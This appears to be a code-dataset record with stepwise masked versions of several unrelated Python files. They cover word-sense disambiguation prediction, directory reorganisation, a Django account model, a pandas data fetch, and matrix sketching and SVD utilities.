else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\nif __name__ == '__main__':\n predict_babelnet(\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml'\n , '../output',\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources'\n )\n", "step-5": "from model import WSD\nfrom data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex\nfrom typing import List, Dict, Tuple\nfrom prova import convert_sentence_to_features_no_padding\nimport numpy as np\nimport os\nfrom nltk.corpus import wordnet\n\n\nmfs_counter = 0\n\n\ndef predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print(\">>>> BABELNET PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"babelnet.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n prediction_results[index][0][0],\n vocab=vocab_label_bn,\n enable_coarse_grained=1,\n vocab_for_coarse=None)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> WORDNET DOMAINS PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"wndomains.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n prediction_results[index][1][0],\n vocab=vocab_label_wndmn,\n enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> LEXICOGRAPHER PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path, resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + \"lexicon.gold.key.txt\"\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path,output_path,\n prediction_results[index][2][0],\n vocab= vocab_label_lex,\n enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path : str, resources_path : str) -> Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path+\"/vocabularies/bert_vocab.txt\", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path+\"/saved_model/model_20_2.14.h5\")\n to_return = []\n sentences_xml_elements = etree_data.xpath(\"/*/*/*\")\n for sentence in train:\n feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore)\n results = modello.model.predict(\n {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3},\n verbose=1\n )\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str,\n frase,\n resources_path: str,\n outputh_path: str,\n predictions,\n vocab = None,\n enable_coarse_grained: int = 1,\n vocab_for_coarse = None) -> int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path+\"/mapping/lemma2wn.txt\")\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n # MFS\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn)\n\n candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version,\n parola.text,\n vocab,\n predictions[index],\n enable_coarse_grained=enable_coarse_grained)\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n #MFS\n mfs_counter += 1\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + \"/\"+filename, \"a\") as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + \" \" + tupla[1]+\"\\n\")\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = \"wn:\" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else \"factotum\"\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\ndef __type_checker(value: object) -> str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\ndef __decide_pos(pos: str) -> str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = \"n\"\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + \"_\" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n\nif __name__ == \"__main__\":\n predict_babelnet(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_wordnet_domains(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_lexicographer(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n", "step-ids": [ 7, 9, 11, 12, 15 ] }
[ 7, 9, 11, 12, 15 ]
import os import shutil # root_path = '../from_1691' root_path = 'C:/Users/koyou/Desktop/test' # 실수할 수도 있으므로 dry_run 을 설정해서 로그만 찍을 것인지 # 실제 작동도 진행할 것인지 결정한다. # dry_run = True dry_run = False def move_directory(input_directory_path, output_directory_path): print("moving %s to %s" % (input_directory_path, output_directory_path)) if not dry_run: shutil.move(input_directory_path, output_directory_path) # # main # print("Root dir is %s" % root_path) for level1 in os.listdir(root_path): # level1 == test1 level1_path = os.path.join(root_path, level1) if os.path.isdir(level1_path): # 디렉토리 이름을 출력해줘야 진행상황 알 수 있음 print("> %s" % level1) for level2 in os.listdir(level1_path): # level2 == test1-1 level2_path = os.path.join(level1_path, level2) if os.path.isdir(level2_path): # level2 이름 출력 print(">> %s" % level2) move_directory(level2_path, root_path) # 2. deleting dir print("Deleting %s" % level1_path) if not dry_run: shutil.rmtree(level1_path)
normal
{ "blob_id": "7de19a85a6a05bd2972b11571d5f05219c6beb1a", "index": 916, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef move_directory(input_directory_path, output_directory_path):\n print('moving %s to %s' % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef move_directory(input_directory_path, output_directory_path):\n print('moving %s to %s' % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\nprint('Root dir is %s' % root_path)\nfor level1 in os.listdir(root_path):\n level1_path = os.path.join(root_path, level1)\n if os.path.isdir(level1_path):\n print('> %s' % level1)\n for level2 in os.listdir(level1_path):\n level2_path = os.path.join(level1_path, level2)\n if os.path.isdir(level2_path):\n print('>> %s' % level2)\n move_directory(level2_path, root_path)\n print('Deleting %s' % level1_path)\n if not dry_run:\n shutil.rmtree(level1_path)\n", "step-4": "<mask token>\nroot_path = 'C:/Users/koyou/Desktop/test'\ndry_run = False\n\n\ndef move_directory(input_directory_path, output_directory_path):\n print('moving %s to %s' % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\nprint('Root dir is %s' % root_path)\nfor level1 in os.listdir(root_path):\n level1_path = os.path.join(root_path, level1)\n if os.path.isdir(level1_path):\n print('> %s' % level1)\n for level2 in os.listdir(level1_path):\n level2_path = os.path.join(level1_path, level2)\n if os.path.isdir(level2_path):\n print('>> %s' % level2)\n move_directory(level2_path, root_path)\n print('Deleting %s' % level1_path)\n if not dry_run:\n shutil.rmtree(level1_path)\n", "step-5": "import os\nimport shutil\n\n# root_path = '../from_1691'\nroot_path = 'C:/Users/koyou/Desktop/test'\n\n# 실수할 수도 있으므로 dry_run 을 설정해서 로그만 찍을 것인지\n# 실제 작동도 진행할 것인지 결정한다.\n# dry_run = True\ndry_run = False\n\ndef move_directory(input_directory_path, output_directory_path):\n print(\"moving %s to %s\" % (input_directory_path, output_directory_path))\n if not dry_run:\n shutil.move(input_directory_path, output_directory_path)\n\n\n#\n# main\n#\nprint(\"Root dir is %s\" % root_path)\n\nfor level1 in os.listdir(root_path): # level1 == test1\n level1_path = os.path.join(root_path, level1)\n if os.path.isdir(level1_path):\n # 디렉토리 이름을 출력해줘야 진행상황 알 수 있음\n print(\"> %s\" % level1)\n\n for level2 in os.listdir(level1_path): # level2 == test1-1\n level2_path = os.path.join(level1_path, level2)\n if os.path.isdir(level2_path):\n # level2 이름 출력\n print(\">> %s\" % level2)\n\n move_directory(level2_path, root_path)\n\n # 2. deleting dir\n print(\"Deleting %s\" % level1_path)\n if not dry_run:\n shutil.rmtree(level1_path)\n", "step-ids": [ 0, 1, 2, 3, 5 ] }
[ 0, 1, 2, 3, 5 ]
import datetime from django.db import models from django.utils import timezone class Acoount(models.Model): first_name = models.CharField("Ім\'я", max_length=50) last_name = models.CharField('Прізвище', max_length=50) username = models.CharField('Псевдонім', max_length=50) email = models.CharField('Електронна почта', max_length=16) password = models.CharField('Пароль', max_length=16) def __str__(self): return self.first_name + ' ' + self.last_name class Meta: verbose_name = 'Акаунт' verbose_name_plural = 'Акаунти'
normal
{ "blob_id": "18c2fe40b51ad1489d55aa2be068a1c4f381a2a5", "index": 553, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Acoount(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'\n", "step-3": "<mask token>\n\n\nclass Acoount(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.first_name + ' ' + self.last_name\n\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'\n", "step-4": "import datetime\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass Acoount(models.Model):\n first_name = models.CharField(\"Ім'я\", max_length=50)\n last_name = models.CharField('Прізвище', max_length=50)\n username = models.CharField('Псевдонім', max_length=50)\n email = models.CharField('Електронна почта', max_length=16)\n password = models.CharField('Пароль', max_length=16)\n\n def __str__(self):\n return self.first_name + ' ' + self.last_name\n\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'\n", "step-5": "import datetime\nfrom django.db import models\n\nfrom django.utils import timezone\n\n\nclass Acoount(models.Model):\n first_name = models.CharField(\"Ім\\'я\", max_length=50)\n last_name = models.CharField('Прізвище', max_length=50)\n username = models.CharField('Псевдонім', max_length=50)\n email = models.CharField('Електронна почта', max_length=16)\n password = models.CharField('Пароль', max_length=16)\n \n\n\n def __str__(self):\n return self.first_name + ' ' + self.last_name\n\n class Meta:\n verbose_name = 'Акаунт'\n verbose_name_plural = 'Акаунти'", "step-ids": [ 0, 1, 2, 4, 5 ] }
[ 0, 1, 2, 4, 5 ]
from page_parsing import get_item_info_from,url_list,item_info,get_links_from # ================================================= < <链接去重 > > ===================================================== # 设计思路: # 1.分两个数据库,第一个用于只用于存放抓取下来的 url (ulr_list);第二个则储存 url 对应的物品详情信息(item_info) # 2.在抓取过程中在第二个数据库中写入数据的同时,新增一个字段(key) 'index_url' 即该详情对应的链接 # 3.若抓取中断,在第二个存放详情页信息的数据库中的 url 字段应该是第一个数据库中 url 集合的子集 # 4.两个集合的 url 相减得出剩下应该抓取的 url 还有哪些 db_urls = [item['url'] for item in url_list.find()] # 用列表解析式装入所有要爬取的链接 index_urls = [item['url'] for item in item_info.find()] # 所引出详情信息数据库中所有的现存的 url 字段 x = set(db_urls) # 转换成集合的数据结构 y = set(index_urls) rest_of_urls = x-y # 相减 # ======================================================================================================================
normal
{ "blob_id": "4f2017632d905c80c35fbaead83ecb7e1ac95760", "index": 9868, "step-1": " from page_parsing import get_item_info_from,url_list,item_info,get_links_from\n\n\n # ================================================= < <链接去重 > > =====================================================\n\n # 设计思路:\n # 1.分两个数据库,第一个用于只用于存放抓取下来的 url (ulr_list);第二个则储存 url 对应的物品详情信息(item_info)\n # 2.在抓取过程中在第二个数据库中写入数据的同时,新增一个字段(key) 'index_url' 即该详情对应的链接\n # 3.若抓取中断,在第二个存放详情页信息的数据库中的 url 字段应该是第一个数据库中 url 集合的子集\n # 4.两个集合的 url 相减得出剩下应该抓取的 url 还有哪些\n\n\n db_urls = [item['url'] for item in url_list.find()] # 用列表解析式装入所有要爬取的链接\n index_urls = [item['url'] for item in item_info.find()] # 所引出详情信息数据库中所有的现存的 url 字段\n x = set(db_urls) # 转换成集合的数据结构\n y = set(index_urls)\n rest_of_urls = x-y # 相减\n\n # ======================================================================================================================\n\n\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#Function to remove spaces in a string def remove(string_input): return string_input.replace(" ", "")
normal
{ "blob_id": "f327f408ae2759407ac9f01ad4feff5c6a0845f1", "index": 9524, "step-1": "<mask token>\n", "step-2": "def remove(string_input):\n return string_input.replace(' ', '')\n", "step-3": "#Function to remove spaces in a string\n\ndef remove(string_input):\n return string_input.replace(\" \", \"\")\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import requests import json import pandas as pd n1 = 'ADS' api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1 df = pd.read_csv(api_url) df = df.head(100) print(df.head()) #print(list(data))
normal
{ "blob_id": "3dd4b4d4241e588cf44230891f496bafb30c6153", "index": 46, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(df.head())\n", "step-3": "<mask token>\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "step-4": "import requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "step-5": "\n\nimport requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n#print(list(data))\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Common methods shared by MNIST and ImageNet experiments.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import errno import getpass import numpy as np import tensorflow as tf import matplotlib.pyplot as plt # mkdir -p in Python >2.5 def mkdir_p(path): try: os.makedirs(path, mode=0o755) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise # Returns path to postfix under user's Unix home directory. def make_experiment_dir(postfix): home = os.path.expanduser('~') exp_dir = os.path.join(home, postfix) mkdir_p(exp_dir) return exp_dir # appends .png to file name def save_fig(folder, filename): if folder is None: return filename_out = os.path.join(folder, filename + '.png') print('saving {}'.format(filename_out)) with open(filename_out, 'w') as out_file: plt.savefig(out_file) # appends .txt to file name def save_array(x, folder, filename, formatting): if folder is None: return filename_out = os.path.join(folder, filename + '.txt') print('saving {}'.format(filename_out)) with open(filename_out, 'w') as out_file: np.savetxt(out_file, x, fmt=formatting) def load_array(filename): with open(filename, 'r') as f: return np.loadtxt(f) # count parameters for svd truncation def count_parameters_list(k_values, nrows, ncols): new_list = [] for k in k_values: new_k = count_parameters(k, nrows, ncols) new_list.append(new_k) return new_list # number of parameters when nrows-by-ncols matrix is approximated # with product of nrows-by-rank and rank-by-ncolds matrix. def count_parameters(rank, nrows, ncols): return (nrows + ncols) * rank # Return one random rademacher matrix def fully_random_rademacher_matrix(nrows, ncols): plus_minus_one = np.array([-1, 1], dtype=np.float32) return np.random.choice(plus_minus_one, (nrows, ncols)) # Return a rank-1 Rademacher matrix def rank1_rademacher(nrows, ncols): plus_minus_one = np.array([-1, 1], dtype=np.float32) column_vector = np.random.choice(plus_minus_one, (nrows, 1)) row_vector = np.random.choice(plus_minus_one, (1, ncols)) # Plain * is quicker than equivalent np.dot(column_vector, row_vector) return column_vector * row_vector # Sketch matrix A def sketch_matrix(A, sketch_type, k): tf.logging.info('sketch_matrix %s %d', sketch_type, k) h1 = A.shape[0] h2 = A.shape[1] # Numpy defaults to int64 or float64 (double precision). # Computing with float32 (single precision) is quicker. A_hat = np.zeros((h1, h2), dtype=np.float32) for i in range(0, k): tf.logging.log_every_n(tf.logging.INFO, 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k) # generate random matrix if sketch_type == 'arora': mat = fully_random_rademacher_matrix(h1, h2) elif sketch_type == 'our_sketch': mat = rank1_rademacher(h1, h2) else: print('wrong sketch_type variable') return -1 # get coefficient coefficient = np.dot(np.ravel(A), np.ravel(mat)) # add coefficient*matrix to A_hat A_hat += coefficient * mat tf.logging.info('Done sketch_matrix %s %d', sketch_type, k) return (1.0 / k) * A_hat # Return truncated svd of A, where only the top k components are used. # Adding --copt=-mavx --copt=-mavx2 --copt=-mfma compiler flags # speeds up svd by almost 2x. However it makes sketching, which is dominant, # a tiny bit slower and hence it's not worth it. def truncated_svd(A, k): tf.logging.info('Computing SVD ...') u, s, v = np.linalg.svd(A, full_matrices=False) u_trunc = u[:, 0:k] s_trunc = s[0:k] v_trunc = v[0:k, :] A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc)) tf.logging.info('Done computing SVD ...') return A_hat # num_params is rank for SVD, number of coefficients for sketches. def compress(A, compression_type, num_params): if compression_type == 'svd': A_hat = truncated_svd(A, num_params) elif compression_type == 'our_sketch' or compression_type == 'arora': A_hat = sketch_matrix(A, compression_type, num_params) else: print('Error: wrong compression type. Must be svd, our_sketch, or arora.') return A_hat # return singular values of A sorted in descending order def singular_values(A): u, s, v = np.linalg.svd(A) sing = sorted(s, reverse=True) return sing def plot_and_save_singular_values(s, folder, fn, nrows, ncols): x = range(1, len(s) + 1) y = sorted(s, reverse=True) title = 'Singular values\ndim = (' + str(nrows) + 'x' + str(ncols) + ')' plt.plot(x, y) plt.title(title) plt.tight_layout() save_fig(folder, fn) save_array(np.array(s), folder, fn + '_vals', '%.18e')
normal
{ "blob_id": "f253816d08407950caad28f1ce630ac2b099aa70", "index": 3241, "step-1": "<mask token>\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\n<mask token>\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\n<mask token>\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += 